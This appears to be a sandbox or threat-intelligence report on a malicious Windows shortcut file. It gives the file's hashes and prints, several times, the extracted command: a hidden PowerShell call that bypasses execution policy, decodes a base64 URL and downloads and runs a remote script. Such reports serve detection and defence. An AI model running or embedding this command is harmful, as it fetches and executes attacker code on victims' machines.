| Hash | Hash Value |
|---|---|
| MD5 | 36f7f4d6eb585a5d5eff759287f6b8d7 |
| Sha1 | 0e27b805ea2912c6e619e16a429820d5014b7500 |
| Sha256 | b2d37a411be06457caf2304ba93bc85e447082acbbc8c82f6d171e7911045751 |
| Sha384 | 803e91d48217f399fe2577e69194e19852e1f53216de94edc6b39c9efd2d9f230c87c906c1275edf74beaf156cd4f341 |
| Sha512 | 46ecaf5ca8610abbb66049c94b1ed2155af6ff0c380ec24484a3fe107b3f34139032ab5f36344f79cbf58037054ffeca94d2c77abdf8577b3f44114572793c77 |
| SSDeep | 48:8W9mf74zJSvZtJbkT/kO+xADSPodLXuHH3j3nul9:8qN47Yg/xADDuTul |
| TLSH | D841E1052BE80715E2F34F3155BBAF56A57BBC1AEB25AE1E0082124948B2A10DC25F7B |

| Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe -w h -ep bypass -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" |

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell.exe -w h -ep bypass -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious | 36f7f4d6eb585a5d5eff759287f6b8d7 |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious | 36f7f4d6eb585a5d5eff759287f6b8d7 > LNK CommandLine |
| Deobfuscated PowerShell | powershell.exe -w "h" -ep "bypass" -nop -Command "$a='aHR0cHM6Ly9sYXRlbmN5eC5weXRob25hbnl3aGVyZS5jb20vZG93bmxvYWQvMDVhZWRiMDVhOWYxNDdkYmE4MjNlMTk4YjJhYzc5ZGIudHh0';$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a));$c=New-Object Net.WebClient;iex $c.DownloadString($b)" Malicious | 36f7f4d6eb585a5d5eff759287f6b8d7 > LNK CommandLine > [Deobfuscated PS] |